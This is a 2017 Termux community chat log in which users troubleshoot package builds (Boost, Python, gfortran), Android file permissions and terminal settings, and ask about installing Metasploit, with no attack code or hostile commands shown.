2017-04-28 11:29:21 gitter1 (prinxy) Hello room… Am using how2 to search things with my Android phone…. How do I click on the links provided?
2017-04-28 11:46:51 u0_a97 how2?
2017-04-28 12:55:37 gitter1 (vishalbiswas) I’m now two updates behind openjdk. Did anyone try building latest tag?
2017-04-28 22:41:05 gitter1 (vishalbiswas) Isn’t boost good enough to be merged into the main repo?
2017-04-28 22:45:30 gitter1 (mklein994) live_the_dream: I just tried compiling ncmpcpp
with your boost package and it failed: configure: error: cannot find the flags to link with Boost locale
. Is that an option missing from the build.sh
for boost?
2017-04-28 22:45:54 live_the_dream the boost.locale lib isn’t build
2017-04-28 22:46:02 live_the_dream you need to do that …
2017-04-28 22:46:13 live_the_dream but yeah i will try it now
2017-04-28 22:46:58 gitter1 (mklein994) OK thanks. I’m building on my phone, but I can try in a docker image too.
2017-04-28 22:46:58 live_the_dream if i can build it i will up a version of it
2017-04-28 22:48:01 gitter1 (mklein994) I’d appreciate it. This was a quick test since you just posted that boost works.
2017-04-28 22:49:38 live_the_dream which arch you using?
2017-04-28 22:53:07 gitter1 (mklein994) arm
2017-04-28 22:54:52 gitter1 (sdrausty) arm and you live_the_dream
?
2017-04-28 22:55:02 live_the_dream i use both aarch64 and arm
2017-04-28 22:55:14 live_the_dream arm is old broken phone i use to test stuff
2017-04-28 22:58:41 live_the_dream okay in a few seconds try –reinstall i didn’t move the version number…
2017-04-28 22:58:47 live_the_dream mistake on my part
2017-04-28 23:01:14 gitter1 (mklein994) OK I’ll try..
2017-04-28 23:05:43 gitter1 (mklein994) OK next step: program_options
.
2017-04-28 23:06:46 gitter1 (mklein994) If it’s simple, I could try. Is there a reference for Boost compile options?
2017-04-28 23:07:59 gitter1 (mklein994) Here’s where it failed: configure: error: cannot find the flags to link with Boost program_options
2017-04-28 23:16:44 live_the_dream try updating
2017-04-28 23:20:47 gitter1 (mklein994) Trying again…
2017-04-28 23:27:43 gitter1 (mklein994) I might just want to find out what all the missing libraries are. Now its missing Thread
.
2017-04-28 23:28:39 live_the_dream we can’t do thread
2017-04-28 23:32:24 gitter1 (mklein994) Noob question, but why not?
2017-04-28 23:33:45 live_the_dream no wait
2017-04-28 23:33:47 live_the_dream im wrong
2017-04-28 23:33:54 live_the_dream some of these libs do not have android support
2017-04-28 23:33:59 live_the_dream thread is fine
2017-04-28 23:55:59 qbject hi all.
2017-04-29 00:12:10 abff hulllo
2017-04-29 02:48:46 gitter1 (bitcoinmeetups) Is there a way to access the Termux home directory on the internal storage without using a root file explorer? ES file explorer cannot browse to this part of storage as far as I know.
2017-04-29 02:49:32 gitter1 (bitcoinmeetups) I want to edit the files in the home directory using an external text editor for convenience
2017-04-29 02:49:43 gitter1 (bitcoinmeetups) In an app like jota+
2017-04-29 02:50:57 gitter1 (vishalbiswas) setup a samba share or ftp
2017-04-29 02:51:10 gitter1 (vishalbiswas) ftp will be easier
2017-04-29 02:57:50 gitter1 (bitcoinmeetups) Isn’t there an easier way to access files from the home directory in external apps? I’m thinking if Termux can access files higher up in the file hierarchy without root then I should be able to open files in Termux home with external apps as well.
2017-04-29 02:58:09 gitter1 (vishalbiswas) no
2017-04-29 02:58:29 gitter1 (vishalbiswas) you can open read-only but not for writing
2017-04-29 02:58:55 gitter1 (vishalbiswas) anything under /data/data is only accessible by the package that owns it
2017-04-29 02:59:00 gitter1 (bitcoinmeetups) Okay.
2017-04-29 02:59:13 gitter1 (bitcoinmeetups) I will move some files to external storage then.
2017-04-29 02:59:18 gitter1 (bitcoinmeetups) That should be alright, right?
2017-04-29 02:59:33 gitter1 (vishalbiswas) yes
2017-04-29 02:59:44 gitter1 (bitcoinmeetups) Also, how come Termux can do root exploring while ES explorer cannot?
2017-04-29 03:00:16 gitter1 (vishalbiswas) what do you mean?
2017-04-29 03:01:03 gitter1 (bitcoinmeetups) Well now I am looking around in the ../../../../../../etc folder for example
2017-04-29 03:01:15 gitter1 (bitcoinmeetups) I don’t think that folder can be browsed in ES file explorer without root
2017-04-29 03:01:44 gitter1 (vishalbiswas) and what are the contents of that folder?
2017-04-29 03:02:38 gitter1 (bitcoinmeetups) Bluetooth_cal.acdb init.qcom.modem_links.sh
2017-04-29 03:02:38 gitter1 (bitcoinmeetups) C16QL_s5k2p2xx_module_info.xml init.qcom.post_boot.sh
2017-04-29 03:02:38 gitter1 (bitcoinmeetups) Diag.cfg init.qcom.sdio.sh
2017-04-29 03:02:38 gitter1 (bitcoinmeetups) [full message: https://gitter.im/termux/termux?at=59043a8dd32c6f2f094feeb4]
2017-04-29 03:02:40 gitter1 (bitcoinmeetups) And more
2017-04-29 03:03:08 gitter1 (vishalbiswas) it should be accessible from es file explorer too
2017-04-29 03:04:01 gitter1 (bitcoinmeetups) Ah found the button now : D I had forgotten about its existence
2017-04-29 03:04:39 gitter1 (bitcoinmeetups) But when browsing using ES file explorer the Data folder is empty
2017-04-29 03:04:47 gitter1 (bitcoinmeetups) Even though show hidden files is on
2017-04-29 03:04:54 gitter1 (vishalbiswas) and you cannot cd /data
in termux, too
2017-04-29 03:05:34 gitter1 (bitcoinmeetups) Ah, I see.
2017-04-29 03:05:44 gitter1 (vishalbiswas) because you don’t have root access. ls -lah /
to checkout permissions of these directories
2017-04-29 03:05:45 gitter1 (bitcoinmeetups) Only cd /data/com.termux
2017-04-29 03:05:57 gitter1 (vishalbiswas) yes because termux owns that folder
2017-04-29 03:06:11 gitter1 (vishalbiswas) and its /data/data/com.termu
2017-04-29 03:06:13 gitter1 (vishalbiswas) x
2017-04-29 03:06:21 gitter1 (vishalbiswas) not /data/com.termux
2017-04-29 03:07:22 gitter1 (bitcoinmeetups) Yep
2017-04-29 03:07:23 gitter1 (bitcoinmeetups) Ok
2017-04-29 03:07:40 gitter1 (bitcoinmeetups) I will go for a trip with the bicycle now
2017-04-29 03:07:48 gitter1 (bitcoinmeetups) See you later and thanks for the advice : D
2017-04-29 03:08:01 gitter1 (vishalbiswas) anytime (I’m awake)
2017-04-29 03:09:40 gitter1 (vishalbiswas) live_the_dream: where’s your boost build scripts? I want to take a look
2017-04-29 03:26:31 live_the_dream https://github.com/its-pointless/gcc_termux/tree/master/termux-packages/packages/boost
2017-04-29 03:29:53 live_the_dream there is a patch which is my attempt to get the boost.python lib to link with python libs
2017-04-29 03:30:07 live_the_dream because it relies on the linker
2017-04-29 03:30:11 live_the_dream which we do not have
2017-04-29 03:30:16 gitter1 (vishalbiswas) does it work?
2017-04-29 03:30:36 live_the_dream it linked if i recalled
2017-04-29 03:30:45 live_the_dream apart from that i have nfi
2017-04-29 03:32:23 gitter1 (vishalbiswas) any package that relies heavily on boost, which I can test?
2017-04-29 03:32:27 live_the_dream ledger
2017-04-29 03:32:36 live_the_dream dunno bout python.boost
2017-04-29 03:44:26 gitter1 (vishalbiswas) your attempt looks way cleaner than mine although the build seems to be single threaded? bjam supports -j
too
2017-04-29 03:45:02 live_the_dream yeah
2017-04-29 03:45:19 live_the_dream we should add this https://github.com/linux-on-android/patchelf
2017-04-29 03:45:42 gitter1 (vishalbiswas) ` - python : not building`?
2017-04-29 03:45:44 live_the_dream if can change what libraries need so we can fix shit
2017-04-29 03:46:25 gitter1 (vishalbiswas) wow, never knew about that. we need it!
2017-04-29 03:46:45 live_the_dream as in patchelf –add-needed libpython2.7 libutil.so will make libutil.so load pythonlib
2017-04-29 03:47:38 live_the_dream there is a normal version but i never bothered to find android compat version
2017-04-29 04:06:46 gitter1 (vishalbiswas) were you successful in building pythonlib?
2017-04-29 04:16:50 gitter1 (vishalbiswas) because this is what I get /home/vishal/.termux-build/_lib/toolchain-arm-ndk14-api21-v17/bin/../lib/gcc/arm-linux-androideabi/4.9.x/../../../../arm-linux-androideabi/bin/ld: error: cannot find -lpthread
2017-04-29 04:17:19 live_the_dream easy way around that
2017-04-29 04:17:27 live_the_dream we don’t need to specifcally link against that
2017-04-29 04:17:46 gitter1 (vishalbiswas) but where exactly is this flag getting added
2017-04-29 04:17:48 live_the_dream so you can literally symlink libc.so libpthread.so i
2017-04-29 04:17:54 live_the_dream its in python lib
2017-04-29 04:18:21 live_the_dream if i recall
2017-04-29 04:18:23 gitter1 (vishalbiswas) but won’t it still require a libpthread.so if i symlink?
2017-04-29 04:18:40 live_the_dream no
2017-04-29 04:19:02 live_the_dream we have one
2017-04-29 04:19:09 live_the_dream its a symlink on the device
2017-04-29 04:19:51 gitter1 (vishalbiswas) I didn’t know that. If its a symlink on device why isn’t there one when building? might have to fix that
2017-04-29 04:19:53 live_the_dream we just don’t bother with when cross compiling
2017-04-29 04:20:25 live_the_dream when you create a toolchain
2017-04-29 04:20:28 live_the_dream make a symlink
2017-04-29 04:25:04 gitter1 (vishalbiswas) it did build successfully
2017-04-29 04:28:14 gitter1 (vishalbiswas) looks like all modules can be built except context, coroutine and coroutine2
2017-04-29 04:58:17 live_the_dream i did good?
2017-04-29 04:58:22 live_the_dream me did good
2017-04-29 06:07:22 gitter1 (vishalbiswas) now we need some packages to test these
2017-05-01 22:44:31 gitter1 (mklein994) @fornwall neovim 0.2 was just released: https://github.com/neovim/neovim/releases
2017-05-02 00:36:34 u0_a92 /
2017-05-02 02:13:26 frumpylava Is it a known problem that termux-setup-storage doesn’t work over ssh?
2017-05-02 02:57:59 gitter1 (cocodevienne) So when can I expect a fix?@fornwall
2017-05-02 05:38:04 gitter1 (cocodevienne) https://github.com/cocodevienne/guessamania/blob/master/source/app/headers/stringconversion.hpp
2017-05-02 05:38:38 gitter1 (cocodevienne) Here’s a fix. Anyone who wants to convert ints to strings can use this header.
2017-05-02 05:38:42 gitter1 (cocodevienne) @fornwall
2017-05-02 07:34:06 Satyam2345 Yooohooo
2017-05-02 07:34:09 Satyam2345 Anyone here
2017-05-02 08:02:13 MrTijn Satyam2345: There are always people here, if you have a question or something just ask it and wait for a response
2017-05-02 08:02:47 Satyam2345 How far I can make termux as a desktop
2017-05-02 08:03:11 live_the_dream ?
2017-05-02 08:03:19 Satyam2345 I don’t see any DE , and I don’t expect one
2017-05-02 08:04:30 Satyam2345 I just want to install metasploit
2017-05-02 08:04:35 Satyam2345 Is that possible
2017-05-02 08:05:37 gitter1 (cocodevienne) What? Someone need german?
2017-05-02 08:05:40 gitter1 (cocodevienne) Here!
2017-05-02 08:06:29 Satyam2345 I need metasploit
2017-05-02 08:07:09 Satyam2345 Do you have any list of programs that can be installed
2017-05-02 08:08:28 gitter1 (cocodevienne) Uhm no, you’ll have to compile it from source bzw. install it from source. @vishalbiswas managed some witchcraft in that direction… Uhm, any help, amigo? @vishalbiswas
2017-05-02 08:11:25 Satyam2345 gitter1: is it possible to have a DE
2017-05-02 08:16:04 MrTijn Satyam2345: You can’t get a DE in termux
2017-05-02 08:16:17 MrTijn To get a list of all installable packages, run ‘apt list’
2017-05-02 08:16:35 MrTijn Of course you can compile packages yourself if you have the skill & knowledge
2017-05-02 08:24:00 gitter1 (cocodevienne) DE? What is DE?
2017-05-02 08:24:07 gitter1 (cocodevienne) Do you meab
2017-05-02 08:24:16 gitter1 (cocodevienne) *mean an IDE?
2017-05-02 08:24:28 frumpylava @cocodevienne Desktop Environment.
2017-05-02 08:27:10 frumpylava There’s no X Window System on Android, so no DE can run.
2017-05-02 08:36:05 gitter1 (vishalbiswas) but can we do one over vnc?
2017-05-02 08:45:30 frumpylava Well, there is XSDL, so I think an X Server is theoretically possible.
2017-05-02 08:46:13 Satyam2345 Can someone tell me how to make a program run on termux.
2017-05-02 08:46:21 Satyam2345 I need some docs on termux
2017-05-02 08:46:43 Satyam2345 Is it a chroot Linux
2017-05-02 08:46:57 * Satyam2345 got so many questions
2017-05-02 08:48:19 frumpylava Satyam2345: It’s not a chroot linux. It’s a prefixed system
2017-05-02 08:48:46 Satyam2345 For example this https://github.com/busyloop/lolcat
2017-05-02 08:48:46 frumpylava Similar to gentoo-prefix
2017-05-02 08:50:49 frumpylava Satyam2345: you can install ruby with packages install ruby
then you can install lolcat with gem install lolcat
2017-05-02 08:52:17 Satyam2345 If I get root can I get this system to interact with Android hardware. Like doing hardware changes
2017-05-02 08:52:44 frumpylava yes
2017-05-02 08:53:39 Satyam2345 Ohh , it would be great if I can run metasploit on it. I just have to port it
2017-05-02 08:54:42 Satyam2345 How this prefix system is different than a chroot system
2017-05-02 08:54:43 gitter1 (cocodevienne) Vishal, what do you think about the header?
2017-05-02 08:54:47 gitter1 (cocodevienne) @vishalbiswas
2017-05-02 08:54:53 gitter1 (cocodevienne) Will it do?
2017-05-02 08:56:15 frumpylava Satyam2345: A prefixed system runs natively, but all the programms need to be compiled specifically for it. The programs don’t run from /bin but from $PREFIX/bin.
2017-05-02 08:56:56 gitter1 (vishalbiswas) I… am under-qualified. I use C, Java and C# mostly. Wouldn’t mind Rust, though
2017-05-02 08:57:04 gitter1 (vishalbiswas) @cocodevienne
2017-05-02 08:58:09 Satyam2345 frumpylava: thanks , it is native then it’s so good .
2017-05-02 08:58:18 gitter1 (vishalbiswas) Satyam2345: I must warn you that metasploit+Android = $#!T performance
2017-05-02 08:58:53 Satyam2345 Snapdragon 2ghz octacore
2017-05-02 08:59:22 gitter1 (vishalbiswas) Metasploit is ruby based
2017-05-02 08:59:32 gitter1 (vishalbiswas) Not C or even Python
2017-05-02 08:59:57 gitter1 (vishalbiswas) Whatever you have, its still bionic underneath
2017-05-02 09:03:27 Satyam2345 https://usercontent.irccloud-cdn.com/file/RHdJQJRR/Screenshot_2017-05-02-18-26-53-741_com.termux.png
2017-05-02 09:03:37 Satyam2345 Heres the lolcat
2017-05-02 09:04:23 Satyam2345 You could add that in repo maybe
2017-05-02 09:05:44 frumpylava Satyam2345: We generally avoid packaging programs that can be easily installed with either pip or gem.
2017-05-02 09:07:43 Satyam2345 Ohh well that also help in keeping server clean
2017-05-02 09:08:27 gitter1 (vishalbiswas) frumpylava: do you have any idea about how to run apps over an x server on termux?
2017-05-02 09:09:51 Satyam2345 Libhybris gitter1
2017-05-02 09:11:05 Satyam2345 Don’t know if that is useful ,but it’s something Ubuntu touch use to adapt hardware and display server
2017-05-02 09:11:28 frumpylava @vishalbiswas I heard rumors about theories that Xephyr could work, but I was never able to do it myself. I tried running it in a chrooted Ubuntu on termux.
2017-05-02 09:13:19 Satyam2345 Can make a display server app , that connect to system xserver and mirror it’s display in app
2017-05-02 09:13:31 Satyam2345 Crazy idea?
2017-05-02 09:14:32 gitter1 (vishalbiswas) I’m trying to compile tigervnc, but with little luck
2017-05-02 22:07:46 live_the_dream single threaded compiles are annoying…
2017-05-02 22:59:26 bravecold hi, how can i stop a looped process
2017-05-02 23:00:25 bravecold is there any way to send a ctrl+c?
2017-05-02 23:04:29 gitter1 (vishalbiswas) Volume Down + C
2017-05-03 02:36:24 live_the_dream compiling sonething with a 50 thousand line header is annoying
2017-05-03 02:50:14 m712 lol
2017-05-03 02:50:22 m712 is it a generated header?
2017-05-03 02:51:05 live_the_dream no look up CImg.h
2017-05-03 02:51:22 live_the_dream to compile gmic has to be single thread
2017-05-03 07:28:49 gitter1 (Toha_de_twitter) hola..
2017-05-03 07:29:51 gitter1 (Toha_de_twitter) how to open file with termux, have install laravel on android, and how to open the file with tremux ? thanks
2017-05-03 10:34:31 Alpha256 will the updated luajit be packaged for termux?
2017-05-03 10:37:53 Alpha256 luajit 2.1.0 beta3
2017-05-04 01:34:31 vitok hi all
2017-05-04 01:35:02 frumpylava vitok: hi
2017-05-04 01:35:27 vitok can I setup termux session title from a shell (bash)?
2017-05-04 01:36:58 vitok as bash prompt for example
2017-05-04 02:57:17 gitter1 (DNTech) you want to change the bash prompt?
2017-05-04 02:58:14 gitter1 (DNTech) @Toha_de_twitter
2017-05-04 02:58:31 gitter1 (DNTech) what do you actually mean?
2017-05-04 02:58:56 gitter1 (DNTech) Open file within termux or open file with external editor?
2017-05-04 07:45:38 gitter1 (mklein994) vitok: you mean the title in the sidebar; the sidebar used when creating new sessions?
2017-05-04 08:07:27 gitter1 (mklein994) vitok: you could do that with $PROMPT_COMMAND
. Just use xterm escape sequences: printf '\033]2;Hello\007'
, then swipe from the left to see the new title.
2017-05-04 10:53:18 gitter1 (jdubray) Greetings, love Termux! I have a quick question, has anyone been able to bundle a node.js app and create an APK to run that app “as-a-service”? I don’t need any king of GUI, I just want it to run in the background as a local back-end to a Cordova Web app.
2017-05-05 01:40:44 nikita-sk Hello. Has anybody successfully ran simh on termux?
2017-05-05 10:42:56 frumpylava :q
2017-05-05 10:43:03 frumpylava lol sorry.
2017-05-05 14:14:53 gitter1 (namdnguyen) hi, do you guys know if there is a way to downgrade or set the ruby version? I’ve tried rbenv, but the build fails.
2017-05-06 00:25:05 Dhananjay_ Hi! I am android user and I want to install metasploit in termux please anybody can help me.
2017-05-06 05:19:36 Satyam2345 Dhananjay_: you can’t right now
2017-05-06 05:19:43 Satyam2345 I asked same thing heree
2017-05-06 05:19:56 live_the_dream ?
2017-05-06 05:21:35 Satyam2345 Well I didn’t compiled it so can’t tell . It may work if someone give time to compile it . My pc is dead
2017-05-06 05:38:47 live_the_dream metasploit
2017-05-06 05:38:48 live_the_dream ?
2017-05-06 06:52:56 gitter1 (cocodevienne) Simply include it and use this g++ -o file file.cpp
. That is it! @prinxy
2017-05-06 08:23:14 gitter1 (Auxilus) Dhananjay please contact @vishalbiswas , he helped me compile metasploit…works fine…
2017-05-06 08:37:28 gitter1 (cocodevienne) True! @Auxilus Please tell me too!! @vishalbiswas
2017-05-06 11:18:33 gitter1 (vishalbiswas) live_the_dream: do you know how to package ruby packages? Metasploit has been requested many times.
2017-05-06 13:26:49 sumit whats that problem can anyone solve thats
2017-05-06 13:30:29 sumit when i run packages upgrade command then thats i saw error: dpkg was interrupted, you must manually run ‘dpkg –configure -a’ to correct the problem.
2017-05-06 13:31:07 sumit how to solve that?
2017-05-06 13:55:10 gitter1 (Auxilus) Have you tried apt update ?
2017-05-06 13:55:38 gitter1 (Auxilus) Do apt update && apt upgrade
2017-05-06 13:55:49 gitter1 (Auxilus) See if it solves the problem
2017-05-06 14:02:57 gitter1 (vishalbiswas) Run dpkg --configure -a
as it suggests
2017-05-06 16:13:38 sdrausty ~voice hello
2017-05-06 16:44:24 live_the_dream @vishalbiswas ruby packages ? no idea
2017-05-06 16:45:42 gitter1 (cocodevienne) @vishalbiswas Could you walk me through the steps of getting it set up?
2017-05-06 21:10:08 italktocomputers hello, good evening!
2017-05-06 21:14:53 italktocomputers has anybody got experience with ‘rooting’ android devices?
2017-05-06 21:28:17 gitter1 (mklein994) italktocomputers: Yeah; what device do you have?
2017-05-06 21:35:37 sdrausty https://www.reddit.com/r/linux/comments/66fh4f/what_do_you_use_termux_on_android_for/
2017-05-06 21:35:46 sdrausty ?
2017-05-06 21:38:47 sdrausty @vishalbiswas @cocodevienne @mklein994 @fornwall
2017-05-06 21:46:50 gitter1 (vishalbiswas) testing my packages…
2017-05-06 21:55:08 rods-tab3 what program is that in the reddit ?
2017-05-06 21:57:08 rods-tab3 i got termux so i could run awk/gawk on aarch64 lenovo tab3 8 tablet
2017-05-06 22:18:09 sdrausty rods-tab3: What do you use awk and gawk for?
2017-05-06 22:27:25 rods-tab3 short list, >200 items http://web.archive.org/web/20160323045835/http://awk.info/?Sitemap
2017-05-06 22:44:18 u0_a173 mobibot: weather xinxiang
2017-05-06 23:48:57 sdrausty A Table of Contents: rods-tab3: WoW! thx
2017-05-07 00:04:34 rods-tab3 you just do: apt install gawk – and there you have it - the latest 4.1.4 w MPFR
2017-05-07 02:41:39 gitter1 (cocodevienne) - testing Python packages
2017-05-07 02:41:55 gitter1 (cocodevienne) - testing C++ programs
2017-05-07 02:42:21 gitter1 (cocodevienne) - writing C++ and Python packages/programs
2017-05-07 02:42:33 gitter1 (cocodevienne) - developing fun projecys in general
2017-05-07 02:42:44 gitter1 (cocodevienne) I use Termux wayy more than my PC.
2017-05-07 02:42:48 gitter1 (cocodevienne) @sdrausty
2017-05-07 05:30:46 MrTijn u0_a173: Can you maybe stop the join/leave spam? It’s quite annoying
2017-05-07 07:41:03 live_the_dream u0_a1731: is annoying me
2017-05-07 07:41:40 live_the_dream welp /ignore time
2017-05-07 08:56:38 gitter1 (vishalbiswas) ah! Gitter
2017-05-07 08:56:51 gitter1 (vishalbiswas) I’m immune to such nuisances
2017-05-07 09:25:38 gitter1 (cocodevienne) Vishal, what about Metasploit? You could walk me through the steps!:)
2017-05-07 09:57:29 gitter1 (vishalbiswas) Install from source repo. Follow official steps
2017-05-07 11:02:32 gitter1 (cocodevienne) These steps?
2017-05-07 11:02:34 gitter1 (cocodevienne) https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment
2017-05-07 11:05:40 gitter1 (cocodevienne) Some of the prerequisite packages aren’t there…
2017-05-07 11:05:58 gitter1 (cocodevienne) *available inside Termux.
2017-05-07 11:19:28 gitter1 (vishalbiswas) you don’t need them
2017-05-07 14:28:13 rods-tab3 did the wifi lock from the notification go away ?
2017-05-07 14:30:36 rods-tab3 weechat or irssi ?
2017-05-07 15:53:26 frumpylava rods-tab3: weechat. It’s newer and more user friendly. But it’s the same as with screen and tmux. People who are used to the former are very reluctant to switch to the latter.
2017-05-07 15:55:05 rods-tab3 thanks
2017-05-07 15:56:51 frumpylava also the scrollwheel support is excellent for termux. I wish profanity had that.
2017-05-07 16:31:29 live_the_dream ok since boost is in music player daemon is compiling… but not quite working there is code for opensl and openal therd though
2017-05-07 16:33:05 live_the_dream fornwall or ackalker (where did he go? is probably going to be requrred to get it to work within termux though
2017-05-07 16:33:31 live_the_dream that is all… ;)
2017-05-07 18:29:03 live_the_dream opensles isn’t going to work its a java implementation openal might
2017-05-07 19:33:53 live_the_dream okay mpd hangs a lot if you don’t use latest openal-soft sources
2017-05-07 19:59:05 u0_a129 hi people
2017-05-07 20:27:54 van777 ockert: hi. I’ve managed to port forward and ssh from android tv box with termux to the server with weechat. Nice
2017-05-07 20:31:54 van777 tmux on termux, screen on the server..
2017-05-08 00:14:34 live_the_dream hmm seems mpd is using clock_monotone …
2017-05-08 01:44:04 gitter1 (vishalbiswas) live_the_dream: E: Problem parsing dependency Depends
2017-05-08 01:44:04 gitter1 (vishalbiswas) E: Error occurred while processing libsoup (NewVersion2)
2017-05-08 01:44:04 gitter1 (vishalbiswas) E: Problem with MergeList /data/data/com.termux/files/usr/var/lib/apt/lists/its-pointless.github.io_files_dists_termux_extras_binary-arm_Packages
2017-05-08 01:44:04 gitter1 (vishalbiswas) E: The package lists or status file could not be parsed or opened.
2017-05-08 02:44:51 live_the_dream fixed? should be
2017-05-08 04:26:15 gitter1 (Auxilus) Use https://goo.gl/Lso1k2 to get metasploit package ( provided by @vishalbiswas )
2017-05-08 04:30:45 gitter1 (Auxilus) Broken url….sry
2017-05-08 04:30:57 gitter1 (Auxilus) Use this 1 => http://bit.ly/2pbOI16
2017-05-08 06:03:34 Regenaxer Hi all! Is there any chance that the librsvg2-bin package (for the rsvg-convert executable) will be provided in Termux? As librsvg is there already …
2017-05-08 06:20:45 live_the_dream doesn’t that exist in librsvg?
2017-05-08 06:27:32 Regenaxer ah, good question
2017-05-08 06:31:40 Regenaxer on Debian they are separate packages
2017-05-08 07:04:34 live_the_dream we are too damn lazy to be making 20k packages constantly
2017-05-08 07:48:11 gitter1 (swanth) Hi ! I am trying to build g95 in termux from source code. While doing ./configure I am stuck at
2017-05-08 07:48:13 gitter1 (swanth) checking for alloca… yes
2017-05-08 07:48:14 gitter1 (swanth) host = aarch64-unknown-linux-gnu
2017-05-08 07:48:14 gitter1 (swanth) configure: error: Unknown floating point architecture
2017-05-08 07:48:55 gitter1 (swanth) any ideas how to fix the architecture issue
2017-05-08 08:01:02 live_the_dream comping the fortran compiler?
2017-05-08 08:02:39 gitter1 (swanth) Yes! I am unable to find a fortran compiler package for termux. And decided to build g95 from source.
2017-05-08 08:03:25 live_the_dream iv got one
2017-05-08 08:04:06 live_the_dream https://github.com/its-pointless/gcc_termux its my repo
2017-05-08 08:04:28 live_the_dream indtruction there so you can use apt
2017-05-08 08:04:50 live_the_dream what fortran package you after?
2017-05-08 08:05:41 live_the_dream iv got scipy R octsve working
2017-05-08 08:06:07 live_the_dream octave ..
2017-05-08 08:06:20 gitter1 (swanth) Thanks! Anything would do the job. gfortran g95 would be great, I’ve used them before.
2017-05-08 08:07:02 live_the_dream gfortran is in the gcc package if you add my apt to sources.list etc
2017-05-08 08:07:50 gitter1 (swanth) Thanks!
2017-05-08 09:11:48 Regenaxer live_the_dream: Indeed, rsvg-convert is in the package! Thanks for the hint :)
2017-05-08 10:05:26 gitter1 (bitcoinmeetups) Hi there,
2017-05-08 10:05:35 gitter1 (bitcoinmeetups) Is there a one liner to close all active Termux windows and sessions?
2017-05-08 10:05:45 gitter1 (bitcoinmeetups) Apart from typing exit in each and every one of them
2017-05-08 10:13:03 Regenaxer What is pretty fast is typing Ctrl-D repeatedly
2017-05-08 10:13:12 Regenaxer if you have IGNOREEOF=0 in your .bashrc
2017-05-08 10:25:55 gitter1 (bitcoinmeetups) Ah yes now I remember.
2017-05-08 10:26:13 gitter1 (bitcoinmeetups) Haha. Thanks.
2017-05-08 12:33:03 gitter1 (vishalbiswas) Ever had that moment where you have to do something on another branch but your working directory is so messed up that you don’t even remember what goes where?
2017-05-08 13:01:23 gitter1 (vishalbiswas) `gevent.hub.InvalidSwitchError: Invalid switch into <Hub at 0xb658ac10 epoll default pending=0 ref=7 fileno=9>: () (expected <object object at 0xb6bd7528>)
2017-05-08 13:01:23 gitter1 (vishalbiswas) Segmentation fault` Any ideas?
2017-05-08 13:54:38 chatter29 hey guys
2017-05-08 13:54:42 chatter29 allah is doing
2017-05-08 13:54:47 chatter29 sun is not doing allah is doing
2017-05-08 13:54:51 chatter29 to accept Islam say that i bear witness that there is no deity worthy of worship except Allah and Muhammad peace be upon him is his slave and messenger
2017-05-08 16:02:51 gitter1 (Auxilus) What the hell ???! Another botter
2017-05-08 16:02:51 gitter1 (Auxilus)
2017-05-08 18:35:14 gitter1 (mklein994) @Auxilus wouldn’t it be ironic if it was scripted using Termux…
2017-05-08 18:35:34 gitter1 (fornwall) @mklein994 :)
2017-05-08 20:37:16 rods-tab3 termux does scripting ?
2017-05-08 20:54:37 miczac yes
2017-05-08 22:02:33 sdrausty ~eval #c 1
2017-05-08 23:03:01 gitter1 (Auxilus) @marcusti I’d go and create my own 1 if that’s the case ! 😁
2017-05-09 00:57:17 joe_alf Is there alternative for exiftool or qpdf for termux. I want to clean pdf metadata on my android phone before sending or sharimg pdf file?
2017-05-09 01:05:19 frumpylava joe_alf: Try poppler
2017-05-09 01:10:52 joe_alf hi i was disconnected. is there alternative for exiftool or qpdf for clearing pdf file metadata?
2017-05-09 01:19:58 frumpylava joe_alf: Try poppler
2017-05-09 01:21:29 joe_alf thanks. checking it now.
2017-05-09 01:48:18 joe_alf frumpylava: seems that its a library and have to be used on code?
2017-05-09 01:50:03 frumpylava joe_alf: it has utilities like pdfinfo and pdfunite
2017-05-09 01:50:32 frumpylava i know that pdfunite always strips metadata from my pdf files
2017-05-09 02:12:36 joe_alf frumpylava: thank you very much.
2017-05-09 04:23:29 frumpylava hm… I wonder what the cheapest phone that can run termux is.
2017-05-09 05:24:50 Satyam2345 frumpylava: freedom 251
2017-05-09 05:25:46 Satyam2345 That’s like 3.5$ phone
2017-05-09 05:26:29 gitter1 (cocodevienne) yeah unboxtherapy did a video on it
2017-05-09 05:26:51 gitter1 (cocodevienne) keep in mind it needs at least android 5.0
2017-05-09 05:27:05 gitter1 (cocodevienne) what about the android one phones?
2017-05-09 05:28:28 Satyam2345 ^that was cheapest smartphone I known
2017-05-09 05:30:03 Satyam2345 Maybe jio LYF has some cheapest android 5.0/6.0 phone
2017-05-09 05:30:39 gitter1 (cocodevienne) Btw: @fornwall what requirements have to be met for a package to be accepted into the main Termux repo?
2017-05-09 09:07:54 u0_a190 is su only for root
2017-05-09 09:07:58 u0_a190 phones
2017-05-09 09:09:11 fornwall u0_a190: yes, you need root acccess for to use su
2017-05-09 09:10:01 u0_a190 thanks
2017-05-09 09:11:50 gitter1 (fornwall) @cocodevienne there’s no format requirement, it’s a mixture of how useful the package is for termux users and how hard it is to build&maintain
2017-05-09 09:17:47 u0_a190 got it
2017-05-09 10:14:12 gitter1 (cocodevienne) Can I send you a package in the next few days and you submit it to the Termux repo? It’s an interesting package for penetration testing.
2017-05-09 10:14:16 gitter1 (cocodevienne) @fornwall
2017-05-09 10:20:03 Satyam2345 \o/
2017-05-09 10:20:17 Satyam2345 More pentesting tools
2017-05-09 13:29:43 gitter1 (Auxilus) @fornwall @vishalbiswas I want to install wine32 package … Can you help me ..
2017-05-09 13:36:03 gitter1 (cocodevienne) Surely you mean win32?
2017-05-09 13:36:37 gitter1 (Auxilus) Nope
2017-05-09 13:36:40 gitter1 (Auxilus) wine32
2017-05-09 13:39:13 gitter1 (cocodevienne) What’s the error? Is it something with gcc could not be found
?
2017-05-09 13:41:47 gitter1 (Auxilus) Nope…it’s dependencie for an exploit
2017-05-09 13:42:00 gitter1 (Auxilus) Areally dope one
2017-05-09 13:42:13 gitter1 (Auxilus) The one which NSA uses to spy
2017-05-09 13:46:31 sdrausty I am trying to cpan install CGI
; I am getting an undef ERROR
2017-05-09 13:48:59 sdrausty Can anyone try cpan install CGI
; Is this a BUG
2017-05-09 13:57:16 sdrausty I reran cpan install CGI
; This time it installed. Is anyone else getting inconsistent builds with cpan
?
2017-05-09 14:16:44 van777 how do i paste inta tmux terminal with a phisical BT keyboard? Ctrl+V, Ctrl+Shift+V, Shift+Ins do not seem to work :S
2017-05-09 14:17:32 van777 into termux* , running tmux..
2017-05-09 14:19:32 van777 long pressing the mouse doesn’t offer to paste
2017-05-09 14:49:58 gitter1 (Auxilus) How do I install wine32 ?
